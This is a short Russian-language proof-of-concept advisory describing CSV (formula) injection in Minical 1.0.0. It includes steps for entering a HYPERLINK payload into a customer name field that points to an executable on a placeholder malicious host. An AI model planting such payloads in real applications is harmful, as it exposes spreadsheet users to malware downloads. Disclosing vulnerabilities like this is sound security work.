
Доказательство концепции, демонстрирующее уязвимость внедрения CSV в Minical 1.0.0 с помощью вредоносной полезной нагрузки HYPERLINK в поле имени клиента, что приводит к удаленному выполнению кода при загрузке отчета.
Minical 1.0.0 уязвим для CSV-инъекций.
Разработчик: https://github.com/minical/minical
Демо-приложение: https://demo.minical.io/
Шаг 1: Перейдите в модуль "Учет" и нажмите "Создать нового клиента".

Шаг 2: Введите полезную нагрузку в поле "Имя" и нажмите "Создать".
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Шаг 3: Нажмите "Скачать CSV-отчет" и обратите внимание, что полезная нагрузка отображается.
